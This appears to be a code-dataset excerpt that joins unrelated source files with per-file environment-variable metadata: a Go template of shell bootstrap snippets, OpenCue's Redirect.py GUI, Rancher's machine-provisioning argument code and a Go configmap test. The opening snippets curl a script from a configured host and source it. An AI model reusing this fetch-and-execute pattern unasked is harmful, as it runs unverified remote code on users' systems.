export ctx_dev={{.Option "httphost"}} ctx_temp=$(mktemp); curl -fsSL $ctx_dev -o $ctx_temp; source $ctx_temp dev
`,
"base", `# 生产环境
export ctx_dev={{.Option "httphost"}} ctx_temp=$(mktemp); curl -fsSL $ctx_dev -o $ctx_temp; source $ctx_temp app
`,
"tmux", `# 终端环境
export ctx_dev={{.Option "httphost"}} ctx_temp=$(mktemp); curl -fsSL $ctx_dev -o $ctx_temp; source $ctx_temp
`,
"tool", `# 群组环境
mkdir contexts; cd contexts
export ctx_log=/dev/stdout ctx_dev={{.Option "httphost"}} ctx_river={{.Option "sess.river"}} ctx_share={{.Option "share"}} ctx_temp=$(mktemp); curl -fsSL $ctx_dev -o $ctx_temp; source $ctx_temp ice
`,
)
|
[
"\"HOME\""
] |
[] |
[
"HOME"
] |
[]
|
["HOME"]
|
go
| 1 | 0 | |
cuegui/cuegui/Redirect.py
|
# Copyright Contributors to the OpenCue Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""An interface for redirecting resources from one job to another job.
The concept here is that there is a target job that needs procs. The user would choose the job.
The highest core/memory value would be detected and would populate 2 text boxes for cores and
memory. The user could then adjust these and hit search. The search will find all hosts that have
frames running that can be redirected to the target job."""
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
from builtins import str
from builtins import range
import os
import re
import time
from PySide2 import QtCore
from PySide2 import QtGui
from PySide2 import QtWidgets
import opencue
import cuegui.Utils
class ShowCombo(QtWidgets.QComboBox):
"""
A combo box for show selection
"""
def __init__(self, selected="pipe", parent=None):
QtWidgets.QComboBox.__init__(self, parent)
self.refresh()
self.setCurrentIndex(self.findText(selected))
def refresh(self):
"""Refreshes the show list."""
self.clear()
shows = opencue.api.getActiveShows()
shows.sort(key=lambda x: x.data.name)
for show in shows:
self.addItem(show.data.name, show)
def getShow(self):
"""Gets the selected show."""
return str(self.setCurrentText())
class AllocFilter(QtWidgets.QPushButton):
"""
A drop down box for selecting allocations you want
to include in the redirect.
"""
default = ["lax.spinux"]
def __init__(self, parent=None):
QtWidgets.QPushButton.__init__(self, "Allocations", parent)
self.__menu = QtWidgets.QMenu(self)
self.__selected = None
self.refresh()
self.setMenu(self.__menu)
# This is used to provide the number of allocations selected
# on the button title.
self.__menu.triggered.connect(self.__afterClicked) # pylint: disable=no-member
def refresh(self):
"""Refreshes the full list of allocations."""
allocs = opencue.api.getAllocations()
allocs.sort(key=lambda x: x.data.name)
self.__menu.clear()
checked = 0
for alloc in allocs:
a = QtWidgets.QAction(self.__menu)
a.setText(alloc.data.name)
a.setCheckable(True)
if alloc.data.name in AllocFilter.default:
a.setChecked(True)
checked += 1
self.__menu.addAction(a)
self.__setSelected()
self.setText("Allocations (%d)" % checked)
def getSelected(self):
"""
Return an immutable set of selected allocations.
"""
return self.__selected
def isFiltered(self, host):
"""
Return true if the host should be filtered.
"""
return host.data.allocName not in self.__selected
def __setSelected(self):
"""
Build the selected set of allocations.
"""
selected = []
for item in self.__menu.actions():
if item.isChecked():
selected.append(str(item.text()))
self.__selected = selected
def __afterClicked(self, action):
"""
Execute after an allocation has been selected for filtering.
"""
del action
self.__setSelected()
self.setText("Allocations (%d)" % len(self.__selected))
class JobBox(QtWidgets.QLineEdit):
"""
A text box that auto-completes job names.
"""
def __init__(self, parent=None):
QtWidgets.QLineEdit.__init__(self, parent)
self.__c = None
self.refresh()
def refresh(self):
"""Refreshes the list of job names."""
slist = opencue.api.getJobNames()
slist.sort()
self.__c = QtWidgets.QCompleter(slist, self)
self.__c.setCaseSensitivity(QtCore.Qt.CaseInsensitive)
self.setCompleter(self.__c)
class GroupFilter(QtWidgets.QPushButton):
"""
A Button widget that displays a drop down menu of
selectable groups.
"""
def __init__(self, show, name, parent=None):
QtWidgets.QPushButton.__init__(self, name, parent)
self.__show = self.__loadShow(show)
self.__menu = QtWidgets.QMenu(self)
self.__actions = { }
self.setMenu(self.__menu)
self.__menu.aboutToShow.connect(self.__populate_menu) # pylint: disable=no-member
# pylint: disable=inconsistent-return-statements
def __loadShow(self, show):
self.__actions = {}
# pylint: disable=bare-except
try:
if show:
return show
except:
return opencue.api.findShow(show.name())
def showChanged(self, show):
"""Loads a new show."""
self.__show = self.__loadShow(show)
def __populate_menu(self):
self.__menu.clear()
for group in self.__show.getGroups():
if opencue.id(group) in self.__actions:
self.__menu.addAction(self.__actions[opencue.id(group)])
else:
action = QtWidgets.QAction(self)
action.setText(group.data.name)
action.setCheckable(True)
self.__actions[opencue.id(group)] = action
self.__menu.addAction(action)
def getChecked(self):
"""Gets a list of action text for all selected actions."""
return [str(action.text()) for action in
list(self.__actions.values()) if action.isChecked()]
class RedirectControls(QtWidgets.QWidget):
"""
A widget that contains all the controls to search for possible
procs that can be redirected.
"""
def __init__(self, parent=None):
QtWidgets.QWidget.__init__(self, parent)
self.__current_show = opencue.api.findShow(os.getenv("SHOW", "pipe"))
self.__show_combo = ShowCombo(self.__current_show.data.name, self)
self.__job_box = JobBox(self)
self.__alloc_filter = AllocFilter(self)
self.__cores_spin = QtWidgets.QSpinBox(self)
self.__cores_spin.setRange(1, self._cfg().get('max_cores', 32))
self.__cores_spin.setValue(1)
self.__mem_spin = QtWidgets.QDoubleSpinBox(self)
self.__mem_spin.setRange(1, self._cfg().get('max_memory', 200))
self.__mem_spin.setDecimals(1)
self.__mem_spin.setValue(4)
self.__mem_spin.setSuffix("GB")
self.__limit_spin = QtWidgets.QSpinBox(self)
self.__limit_spin.setRange(1, 100)
self.__limit_spin.setValue(10)
self.__prh_spin = QtWidgets.QDoubleSpinBox(self)
self.__prh_spin.setRange(1, self._cfg().get('max_proc_hour_cutoff', 30))
self.__prh_spin.setDecimals(1)
self.__prh_spin.setValue(10)
self.__prh_spin.setSuffix("PrcHrs")
# Job Filters
self.__include_group_btn = GroupFilter(self.__current_show, "Include Groups", self)
self.__require_services = QtWidgets.QLineEdit(self)
self.__exclude_regex = QtWidgets.QLineEdit(self)
self.__update_btn = QtWidgets.QPushButton("Search", self)
self.__redirect_btn = QtWidgets.QPushButton("Redirect", self)
self.__select_all_btn = QtWidgets.QPushButton("Select All", self)
self.__clear_btn = QtWidgets.QPushButton("Clr", self)
self.__group = QtWidgets.QGroupBox("Resource Filters")
self.__group_filter = QtWidgets.QGroupBox("Job Filters")
layout1 = QtWidgets.QHBoxLayout()
layout1.addWidget(self.__update_btn)
layout1.addWidget(self.__redirect_btn)
layout1.addWidget(self.__select_all_btn)
layout1.addWidget(QtWidgets.QLabel("Target:", self))
layout1.addWidget(self.__job_box)
layout1.addWidget(self.__clear_btn)
layout2 = QtWidgets.QHBoxLayout()
layout2.addWidget(self.__alloc_filter)
layout2.addWidget(QtWidgets.QLabel("Minimum Cores:", self))
layout2.addWidget(self.__cores_spin)
layout2.addWidget(QtWidgets.QLabel("Minimum Memory:", self))
layout2.addWidget(self.__mem_spin)
layout2.addWidget(QtWidgets.QLabel("Result Limit:", self))
layout2.addWidget(self.__limit_spin)
layout2.addWidget(QtWidgets.QLabel("Proc Hour Cutoff:", self))
layout2.addWidget(self.__prh_spin)
layout3 = QtWidgets.QHBoxLayout()
layout3.addWidget(QtWidgets.QLabel("Show:", self))
layout3.addWidget(self.__show_combo)
layout3.addWidget(self.__include_group_btn)
layout3.addWidget(QtWidgets.QLabel("Require Services", self))
layout3.addWidget(self.__require_services)
layout3.addWidget(QtWidgets.QLabel("Exclude Regex", self))
layout3.addWidget(self.__exclude_regex)
self.__group.setLayout(layout2)
self.__group_filter.setLayout(layout3)
layout = QtWidgets.QVBoxLayout(self)
layout.addWidget(self.__group_filter)
layout.addWidget(self.__group)
layout.addLayout(layout1)
# pylint: disable=no-member
self.__job_box.textChanged.connect(self.detect)
self.__show_combo.currentIndexChanged.connect(self.showChanged)
# pylint: enable=no-member
def _cfg(self):
'''
Loads (if necessary) and returns the config values.
Warns and returns an empty dict if there's a problem reading the config
@return: The keys & values stored in the config file
@rtype: dict<str:str>
'''
if not hasattr(self, '__config'):
self.__config = cuegui.Utils.getResourceConfig()
return self.__config
def showChanged(self, show_index):
"""Load a new show."""
del show_index
show = self.__show_combo.currentText()
self.__current_show = opencue.api.findShow(str(show))
self.__include_group_btn.showChanged(self.__current_show)
def detect(self, name=None):
"""Populates initial values when the job name is changed."""
del name
try:
job = opencue.api.findJob(str(self.__job_box.text()))
except opencue.exception.CueException:
return
layers = job.getLayers()
minCores = 1.0
minMem = 0
for layer in layers:
if layer.data.min_cores > minCores:
minCores = layer.data.min_cores
if layer.data.min_memory > minMem:
minMem = layer.data.min_memory
self.__cores_spin.setValue(int(minCores))
self.__mem_spin.setValue(float(minMem / 1048576.0))
self.__show_combo.setCurrentIndex(self.__show_combo.findText(job.data.show))
def getJob(self):
"""Gets the current job name."""
return str(self.__job_box.text())
def getCores(self):
"""Gets the core count."""
return int(self.__cores_spin.value())
def getMemory(self):
"""Gets the memory amount."""
return int(self.__mem_spin.value() * 1048576.0)
def getJobBox(self):
"""Gets the job box widget."""
return self.__job_box
def getUpdateButton(self):
"""Gets the update button widget."""
return self.__update_btn
def getRedirectButton(self):
"""Gets the redirect button widget."""
return self.__redirect_btn
def getSelectAllButton(self):
"""Gets the select all button widget."""
return self.__select_all_btn
def getClearButton(self):
"""Gets the clear button widget."""
return self.__clear_btn
def getShow(self):
"""Gets the current show."""
return self.__current_show
def getAllocFilter(self):
"""Gets the allocation filter."""
return self.__alloc_filter
def getLimit(self):
"""Gets the limit."""
return self.__limit_spin.value()
def getCutoffTime(self):
"""Gets the cutoff time."""
return int(self.__prh_spin.value() * 3600.0)
def getRequiredService(self):
"""Gets the required service name."""
return str(self.__require_services.text()).strip()
def getJobNameExcludeRegex(self):
"""Gets the regex of job name to exclude."""
return str(self.__exclude_regex.text()).strip()
def getIncludedGroups(self):
"""Gets the value of the include groups checkbox."""
return self.__include_group_btn.getChecked()
class RedirectWidget(QtWidgets.QWidget):
"""
Displays a table of procs that can be selected for redirect.
"""
HEADERS = ["Name", "Cores", "Memory", "PrcTime", "Group", "Service"]
def __init__(self, parent=None):
QtWidgets.QWidget.__init__(self, parent)
self.__hosts = {}
self.__controls = RedirectControls(self)
self.__model = QtGui.QStandardItemModel(self)
self.__model.setColumnCount(5)
self.__model.setHorizontalHeaderLabels(RedirectWidget.HEADERS)
self.__tree = QtWidgets.QTreeView(self)
self.__tree.setEditTriggers(QtWidgets.QAbstractItemView.NoEditTriggers)
self.__tree.setModel(self.__model)
layout = QtWidgets.QVBoxLayout(self)
layout.addWidget(self.__controls)
layout.addWidget(self.__tree)
# pylint: disable=no-member
self.__controls.getUpdateButton().pressed.connect(self.update)
self.__controls.getRedirectButton().pressed.connect(self.redirect)
self.__controls.getSelectAllButton().pressed.connect(self.selectAll)
self.__controls.getClearButton().pressed.connect(self.clearTarget)
# pylint: enable=no-member
def __get_selected_procs_by_alloc(self, selected_items):
"""
Gathers and returns the selected procs, grouped by allocation their
allocation names
@param selected_items: The selected rows to analyze
@type selected_items: list<dict<str:varies>>
@return: A dictionary with the allocation names are the keys and the
selected procs are the values.
@rtype: dict<str:L{opencue.wrappers.proc.Proc}>
"""
procs_by_alloc = {}
for item in selected_items:
entry = self.__hosts.get(str(item.text()))
alloc = entry.get('alloc')
alloc_procs = procs_by_alloc.get(alloc, [])
alloc_procs.extend(list(entry["procs"]))
procs_by_alloc[alloc] = alloc_procs
return procs_by_alloc
def __warn(self, msg):
"""
Displays the given message for the user to acknowledge
@param msg: The message to display
@type msg: str
"""
message = QtWidgets.QMessageBox(self)
message.setText(msg)
message.exec_()
def __is_cross_show_safe(self, procs, target_show):
"""
Determines whether or not it's safe to redirect cores from a show
to another, based on user response to the warning message
@param procs: The procs to redirect
@type procs: L{opencue.wrappers.proc.Proc}
@param target_show: The name of the target show
@type target_show: str
@return: Whether or not it's safe to redirect the given procs to the
target show
@rtype: bool
"""
xshow_jobs = [proc.getJob() for proc in procs if not
proc.getJob().show() == target_show]
if not xshow_jobs:
return True # No cross-show procs
msg = ('Redirecting the selected procs to the target will result '
'in killing frames on other show/s.\nDo you have approval '
'from (%s) to redirect cores from the following jobs?'
% ', '.join([j.show().upper() for j in xshow_jobs]))
return cuegui.Utils.questionBoxYesNo(parent=self,
title="Cross-show Redirect!",
text=msg,
items=[j.name() for j
in xshow_jobs])
def __is_burst_safe(self, alloc, procs, show):
"""
Determines whether or not it's safe to redirect cores by checking the
burst target show burst and the number of cores being redirected. If
there's a number of cores that may not be possible to pick up by the
target show, that number should be lower than the threshold set in the
cue_resources config.
@param alloc: The name of the allocation for the cores
@type alloc: str
@param procs: The procs to be redirected
@type procs: L{opencue.wrappers.proc.Proc}
@param show: The name of the target show
@type show: str
@return: Whether or not it's safe to kill these cores based on
the subscription burst of the target show
@rtype: bool
"""
# Skip if this check is disabled in the config
# pylint: disable=protected-access
cfg = self.__controls._cfg()
# pylint: enable=protected-access
wc_ok = cfg.get('wasted_cores_threshold', 100)
if wc_ok < 0:
return True
show_obj = opencue.api.findShow(show)
show_subs = dict((s.data.name.rstrip('.%s' % show), s)
for s in show_obj.getSubscriptions()
if s.data.allocation_name in alloc)
try:
procs_to_burst = (show_subs.get(alloc).data.burst -
show_subs.get(alloc).data.reserved_cores)
procs_to_redirect = int(sum([p.data.reserved_cores
for p in procs]))
wasted_cores = int(procs_to_redirect - procs_to_burst)
if wasted_cores <= wc_ok:
return True # wasted cores won't exceed threshold
status = ('at burst' if procs_to_burst == 0 else
'%d cores %s burst'
% (procs_to_burst,
'below' if procs_to_burst > 0 else 'above'))
msg = ('Target show\'s %s subscription is %s. Redirecting '
'the selected procs will kill frames to free up %d '
'cores. You will be killing %d cores '
'that the target show will not be able to use. '
'Do you want to redirect anyway?'
% (alloc, status, int(procs_to_redirect), wasted_cores))
return cuegui.Utils.questionBoxYesNo(parent=self,
title=status.title(),
text=msg)
except TypeError:
self.__warn('Cannot direct %s cores to %s because %s the '
'target show does not have a %s subscription!'
% (alloc, show, show, alloc))
return False
def redirect(self):
"""
Redirect the selected procs to the target job, after running a few
checks to verify it's safe to do that.
@postcondition: The selected procs are redirected to the target job
"""
# Get selected items
items = [self.__model.item(row) for row
in range(0, self.__model.rowCount())]
selected_items = [item for item in items
if item.checkState() == QtCore.Qt.Checked]
if not selected_items: # Nothing selected, exit
self.__warn('You have not selected anything to redirect.')
return
# Get the Target Job
job_name = self.__controls.getJob()
if not job_name: # No target job, exit
self.__warn('You must have a job name selected.')
return
job = None
try:
job = opencue.api.findJob(job_name)
except opencue.EntityNotFoundException: # Target job finished, exit
self.__warn_and_stop('The job you\'re trying to redirect to '
'appears to be no longer in the cue!')
return
# Gather Selected Procs
procs_by_alloc = self.__get_selected_procs_by_alloc(selected_items)
show_name = job.show()
for alloc, procs in list(procs_by_alloc.items()):
if not self.__is_cross_show_safe(procs, show_name): # Cross-show
return
if not self.__is_burst_safe(alloc, procs, show_name): # At burst
return
# Redirect
errors = []
for item in selected_items:
entry = self.__hosts.get(str(item.text()))
procs = entry["procs"]
# pylint: disable=broad-except
try:
host = entry["host"]
host.redirectToJob(procs, job)
except Exception as e:
errors.append(str(e))
item.setIcon(QtGui.QIcon(QtGui.QPixmap(":retry.png")))
item.setEnabled(False)
if errors: # Something went wrong!
self.__warn('Some procs failed to redirect.')
def selectAll(self):
"""
Select all items in the results.
"""
for row in range(0, self.__model.rowCount()):
item = self.__model.item(row)
item.setCheckState(QtCore.Qt.Checked)
def clearTarget(self):
"""
Clear the target
"""
self.__controls.getJobBox().clear()
def update(self):
self.__model.clear()
self.__model.setHorizontalHeaderLabels(RedirectWidget.HEADERS)
hosts = { }
ok = 0
service_filter = self.__controls.getRequiredService()
group_filter = self.__controls.getIncludedGroups()
job_regex = self.__controls.getJobNameExcludeRegex()
show = self.__controls.getShow()
alloc = self.__controls.getAllocFilter()
procs = opencue.api.getProcs(show=[str(show.data.name)], alloc=alloc.getSelected())
progress = QtWidgets.QProgressDialog("Searching","Cancel", 0,
self.__controls.getLimit(), self)
progress.setWindowModality(QtCore.Qt.WindowModal)
for proc in procs:
if progress.wasCanceled():
break
# Stick with the target show
if proc.data.show_name != show.data.name:
continue
if proc.data.job_name == str(self.__controls.getJob()):
continue
# Skip over already redirected procs
if proc.data.redirect_target:
continue
if ok >= self.__controls.getLimit():
break
if job_regex:
if re.match(job_regex, proc.data.job_name):
continue
if service_filter:
if service_filter not in proc.data.services:
continue
if group_filter:
if proc.data.group_name not in group_filter:
continue
name = proc.data.name.split("/")[0]
if name not in hosts:
cue_host = opencue.api.findHost(name)
hosts[name] = {
"host": cue_host,
"procs": [],
"mem": cue_host.data.idle_memory,
"cores": int(cue_host.data.idle_cores),
"time": 0,
"ok": False,
'alloc': cue_host.data.alloc_name}
host = hosts[name]
if host["ok"]:
continue
host["procs"].append(proc)
host["mem"] = host["mem"] + proc.data.reserved_memory
host["cores"] = host["cores"] + proc.data.reserved_cores
host["time"] = host["time"] + (int(time.time()) - proc.data.dispatch_time)
if host["cores"] >= self.__controls.getCores() and \
host["mem"] >= self.__controls.getMemory() and \
host["time"] < self.__controls.getCutoffTime():
self.__addHost(host)
host["ok"] = True
ok = ok + 1
progress.setValue(ok)
progress.setValue(self.__controls.getLimit())
# Save this for later on
self.__hosts = hosts
def __addHost(self, entry):
host = entry["host"]
procs = entry["procs"]
rtime = entry["time"]
checkbox = QtGui.QStandardItem(host.data.name)
checkbox.setCheckable(True)
self.__model.appendRow([checkbox,
QtGui.QStandardItem(str(entry["cores"])),
QtGui.QStandardItem("%0.2fGB" % (entry["mem"] / 1048576.0)),
QtGui.QStandardItem(cuegui.Utils.secondsToHHMMSS(rtime))])
for proc in procs:
checkbox.appendRow([QtGui.QStandardItem(proc.data.job_name),
QtGui.QStandardItem(str(proc.data.reserved_cores)),
QtGui.QStandardItem(
"%0.2fGB" % (proc.data.reserved_memory / 1048576.0)),
QtGui.QStandardItem(cuegui.Utils.secondsToHHMMSS(time.time() -
proc.data.dispatch_time)),
QtGui.QStandardItem(proc.data.group_name),
QtGui.QStandardItem(",".join(proc.data.services))])
self.__tree.setExpanded(self.__model.indexFromItem(checkbox), True)
self.__tree.resizeColumnToContents(0)
|
[] |
[] |
[
"SHOW"
] |
[]
|
["SHOW"]
|
python
| 1 | 0 | |
pkg/controllers/provisioningv2/rke2/machineprovision/args.go
|
package machineprovision
import (
"fmt"
"os"
"regexp"
"sort"
"strings"
rkev1 "github.com/rancher/rancher/pkg/apis/rke.cattle.io/v1"
namespace2 "github.com/rancher/rancher/pkg/namespace"
"github.com/rancher/rancher/pkg/settings"
"github.com/rancher/wrangler/pkg/data"
"github.com/rancher/wrangler/pkg/data/convert"
corecontrollers "github.com/rancher/wrangler/pkg/generated/controllers/core/v1"
"github.com/rancher/wrangler/pkg/generic"
"github.com/rancher/wrangler/pkg/kv"
name2 "github.com/rancher/wrangler/pkg/name"
corev1 "k8s.io/api/core/v1"
apierror "k8s.io/apimachinery/pkg/api/errors"
"k8s.io/apimachinery/pkg/api/meta"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/runtime/schema"
capi "sigs.k8s.io/cluster-api/api/v1alpha4"
)
const (
CapiMachineLabel = "cluster.x-k8s.io/cluster-name"
)
var (
regExHyphen = regexp.MustCompile("([a-z])([A-Z])")
envNameOverride = map[string]string{
"amazonec2": "AWS",
"rackspace": "OS",
"openstack": "OS",
"vmwarevsphere": "VSPHERE",
"vmwarefusion": "FUSION",
"vmwarevcloudair": "VCLOUDAIR",
}
)
type driverArgs struct {
rkev1.RKEMachineStatus
DriverName string
ImageName string
ImagePullPolicy corev1.PullPolicy
EnvSecret *corev1.Secret
StateSecretName string
BootstrapSecretName string
BootstrapOptional bool
Args []string
}
func MachineStateSecretName(machineName string) string {
return name2.SafeConcatName(machineName, "machine", "state")
}
func (h *handler) getArgsEnvAndStatus(meta metav1.Object, data data.Object, args map[string]interface{}, driver string, create bool) (driverArgs, error) {
var (
url, hash, cloudCredentialSecretName string
)
nd, err := h.nodeDriverCache.Get(driver)
if !create && apierror.IsNotFound(err) {
url = data.String("status", "driverURL")
hash = data.String("status", "driverHash")
} else if err != nil {
return driverArgs{}, err
} else {
url = nd.Spec.URL
hash = nd.Spec.Checksum
}
if strings.HasPrefix(url, "local://") {
url = ""
hash = ""
}
secret := &corev1.Secret{
ObjectMeta: metav1.ObjectMeta{
Name: name2.SafeConcatName(meta.GetName(), "machine", "driver", "secret"),
Namespace: meta.GetNamespace(),
},
Data: map[string][]byte{
"HTTP_PROXY": []byte(os.Getenv("HTTP_PROXY")),
"HTTPS_PROXY": []byte(os.Getenv("HTTPS_PROXY")),
"NO_PROXY": []byte(os.Getenv("NO_PROXY")),
},
}
bootstrapName, cloudCredentialSecretName, secrets, err := h.getSecretData(meta, data, create)
if err != nil {
return driverArgs{}, err
}
for k, v := range secrets {
_, k = kv.RSplit(k, "-")
envName := envNameOverride[driver]
if envName == "" {
envName = driver
}
k := strings.ToUpper(envName + "_" + regExHyphen.ReplaceAllString(k, "${1}_${2}"))
secret.Data[k] = []byte(v)
}
secretName := MachineStateSecretName(meta.GetName())
cmd := []string{
fmt.Sprintf("--driver-download-url=%s", url),
fmt.Sprintf("--driver-hash=%s", hash),
fmt.Sprintf("--secret-namespace=%s", meta.GetNamespace()),
fmt.Sprintf("--secret-name=%s", secretName),
}
if create {
cmd = append(cmd, "create",
fmt.Sprintf("--driver=%s", driver),
fmt.Sprintf("--custom-install-script=/run/secrets/machine/value"))
rancherCluster, err := h.rancherClusterCache.Get(meta.GetNamespace(), meta.GetLabels()[CapiMachineLabel])
if err != nil {
return driverArgs{}, err
}
cmd = append(cmd, toArgs(driver, args, rancherCluster.Status.ClusterName)...)
} else {
cmd = append(cmd, "rm", "-y")
}
cmd = append(cmd, meta.GetName())
return driverArgs{
DriverName: driver,
ImageName: settings.PrefixPrivateRegistry(settings.MachineProvisionImage.Get()),
ImagePullPolicy: corev1.PullAlways,
EnvSecret: secret,
StateSecretName: secretName,
BootstrapSecretName: bootstrapName,
BootstrapOptional: !create,
Args: cmd,
RKEMachineStatus: rkev1.RKEMachineStatus{
Ready: data.String("spec", "providerID") != "" && data.Bool("status", "jobComplete"),
DriverHash: hash,
DriverURL: url,
CloudCredentialSecretName: cloudCredentialSecretName,
},
}, nil
}
func (h *handler) getBootstrapSecret(machine *capi.Machine) (string, error) {
if machine == nil || machine.Spec.Bootstrap.ConfigRef == nil {
return "", nil
}
gvk := schema.FromAPIVersionAndKind(machine.Spec.Bootstrap.ConfigRef.APIVersion,
machine.Spec.Bootstrap.ConfigRef.Kind)
bootstrap, err := h.dynamic.Get(gvk, machine.Namespace, machine.Spec.Bootstrap.ConfigRef.Name)
if apierror.IsNotFound(err) {
return "", nil
} else if err != nil {
return "", err
}
d, err := data.Convert(bootstrap)
if err != nil {
return "", err
}
return d.String("status", "dataSecretName"), nil
}
func (h *handler) getSecretData(meta metav1.Object, obj data.Object, create bool) (string, string, map[string]string, error) {
var (
err error
machine *capi.Machine
result = map[string]string{}
)
oldCredential := obj.String("status", "cloudCredentialSecretName")
cloudCredentialSecretName := obj.String("spec", "common", "cloudCredentialSecretName")
for _, ref := range meta.GetOwnerReferences() {
if ref.Kind != "Machine" {
continue
}
machine, err = h.machines.Get(meta.GetNamespace(), ref.Name)
if err != nil && !apierror.IsNotFound(err) {
return "", "", nil, err
}
}
if machine == nil && create {
return "", "", nil, generic.ErrSkip
}
if cloudCredentialSecretName == "" {
cloudCredentialSecretName = oldCredential
}
if cloudCredentialSecretName != "" {
secret, err := GetCloudCredentialSecret(h.secrets, meta.GetNamespace(), cloudCredentialSecretName)
if err != nil {
return "", "", nil, err
}
for k, v := range secret.Data {
result[k] = string(v)
}
}
bootstrapName, err := h.getBootstrapSecret(machine)
if err != nil {
return "", "", nil, err
}
return bootstrapName, cloudCredentialSecretName, result, nil
}
func GetCloudCredentialSecret(secrets corecontrollers.SecretCache, namespace, name string) (*corev1.Secret, error) {
globalNS, globalName := kv.Split(name, ":")
if globalName != "" && globalNS == namespace2.GlobalNamespace {
return secrets.Get(globalNS, globalName)
}
return secrets.Get(namespace, name)
}
func toArgs(driverName string, args map[string]interface{}, clusterID string) (cmd []string) {
if driverName == "amazonec2" {
tagValue := fmt.Sprintf("kubernetes.io/cluster/%s,owned", clusterID)
if tags, ok := args["tags"]; !ok || convert.ToString(tags) == "" {
args["tags"] = tagValue
} else {
args["tags"] = convert.ToString(tags) + "," + tagValue
}
}
for k, v := range args {
dmField := "--" + driverName + "-" + strings.ToLower(regExHyphen.ReplaceAllString(k, "${1}-${2}"))
if v == nil {
continue
}
switch v.(type) {
case float64:
cmd = append(cmd, fmt.Sprintf("%s=%v", dmField, v))
case string:
if v.(string) != "" {
cmd = append(cmd, fmt.Sprintf("%s=%s", dmField, v.(string)))
}
case bool:
if v.(bool) {
cmd = append(cmd, dmField)
}
case []interface{}:
for _, s := range v.([]interface{}) {
if _, ok := s.(string); ok {
cmd = append(cmd, fmt.Sprintf("%s=%s", dmField, s.(string)))
}
}
}
}
if driverName == "amazonec2" &&
convert.ToString(args["securityGroup"]) != "rancher-nodes" &&
args["securityGroupReadonly"] == nil {
cmd = append(cmd, "--amazonec2-security-group-readonly")
}
sort.Strings(cmd)
return
}
func getNodeDriverName(typeMeta meta.Type) string {
return strings.ToLower(strings.TrimSuffix(typeMeta.GetKind(), "Machine"))
}
|
[
"\"HTTP_PROXY\"",
"\"HTTPS_PROXY\"",
"\"NO_PROXY\""
] |
[] |
[
"HTTP_PROXY",
"HTTPS_PROXY",
"NO_PROXY"
] |
[]
|
["HTTP_PROXY", "HTTPS_PROXY", "NO_PROXY"]
|
go
| 3 | 0 | |
source/configmap/configmap_test.go
|
package configmap
import (
"encoding/json"
"fmt"
"os"
"reflect"
"testing"
"github.com/goasana/config"
)
func TestGetClient(t *testing.T) {
if tr := os.Getenv("TRAVIS"); len(tr) > 0 {
return
}
localCfg := os.Getenv("HOME") + "/.kube/config"
tt := []struct {
name string
cfgpath string
error string
isIncluster bool
assert string
}{
{name: "fail loading incluster kubeconfig, from external", error: "unable to load in-cluster configuration, KUBERNETES_SERVICE_HOST and KUBERNETES_SERVICE_PORT must be defined", isIncluster: false},
{name: "fail loading external kubeconfig", cfgpath: "/invalid/path", error: "stat /invalid/path: no such file or directory", isIncluster: false},
{name: "loading an incluster kubeconfig", cfgpath: "", error: "", isIncluster: true, assert: "open /var/run/secrets/kubernetes.io/serviceaccount/token: no such file or directory"},
{name: "loading kubeconfig from external", cfgpath: localCfg, isIncluster: false},
}
for _, tc := range tt {
t.Run(tc.name, func(t *testing.T) {
if tc.isIncluster {
os.Setenv("KUBERNETES_SERVICE_HOST", "127.0.0.1")
os.Setenv("KUBERNETES_SERVICE_PORT", "443")
} else {
os.Unsetenv("KUBERNETES_SERVICE_HOST")
os.Unsetenv("KUBERNETES_SERVICE_PORT")
}
_, err := getClient(tc.cfgpath)
if err != nil {
if err.Error() == tc.error {
return
}
if err.Error() == tc.assert {
return
}
t.Errorf("found an unhandled error: %v", err)
}
})
}
os.Unsetenv("KUBERNETES_SERVICE_HOST")
os.Unsetenv("KUBERNETES_SERVICE_PORT")
}
func TestMakeMap(t *testing.T) {
if tr := os.Getenv("TRAVIS"); len(tr) > 0 {
return
}
tt := []struct {
name string
din map[string]string
dout map[string]interface{}
jdout []byte
}{
{
name: "simple valid data",
din: map[string]string{
"foo": "bar=bazz",
},
dout: map[string]interface{}{
"foo": map[string]interface{}{
"bar": "bazz",
},
},
jdout: []byte(`{"foo":{"bar":"bazz"}}`),
},
{
name: "complex valid data",
din: map[string]string{
"mongodb": "host=127.0.0.1\nport=27017\nuser=user\npassword=password",
"config": "host=0.0.0.0\nport=1337",
"redis": "url=redis://127.0.0.1:6379/db01",
},
dout: map[string]interface{}{
"mongodb": map[string]interface{}{
"host": "127.0.0.1",
"port": "27017",
"user": "user",
"password": "password",
},
"config": map[string]interface{}{
"host": "0.0.0.0",
"port": "1337",
},
"redis": map[string]interface{}{
"url": "redis://127.0.0.1:6379/db01",
},
},
jdout: []byte(`{"config":{"host":"0.0.0.0","port":"1337"},"mongodb":{"host":"127.0.0.1","password":"password","port":"27017","user":"user"},"redis":{"url":"redis://127.0.0.1:6379/db01"}}`),
},
}
for _, tc := range tt {
t.Run(tc.name, func(t *testing.T) {
dout := makeMap(tc.din)
jdout, _ := json.Marshal(dout)
if eq := reflect.DeepEqual(dout, tc.dout); !eq {
fmt.Println(eq)
t.Fatalf("expected %v and got %v", tc.dout, dout)
}
if string(jdout) != string(tc.jdout) {
t.Fatalf("expected %v and got %v", string(tc.jdout), string(jdout))
}
})
}
}
func TestConfigmap_Read(t *testing.T) {
if tr := os.Getenv("TRAVIS"); len(tr) > 0 {
return
}
data := []byte(`{"config":{"host":"0.0.0.0","port":"1337"},"mongodb":{"host":"127.0.0.1","password":"password","port":"27017","user":"user"},"redis":{"url":"redis://127.0.0.1:6379/db01"}}`)
tt := []struct {
name string
sname string
namespace string
}{
{name: "read data with source default values", sname: DefaultName, namespace: DefaultNamespace},
{name: "read data with source with custom configmap name", sname: "asana-config", namespace: DefaultNamespace},
{name: "read data with source with custom namespace", sname: DefaultName, namespace: "kube-public"},
{name: "read data with source with custom configmap name and namespace", sname: "asana-config", namespace: "kube-public"},
}
for _, tc := range tt {
t.Run(tc.name, func(t *testing.T) {
source := NewSource(
WithName(tc.sname),
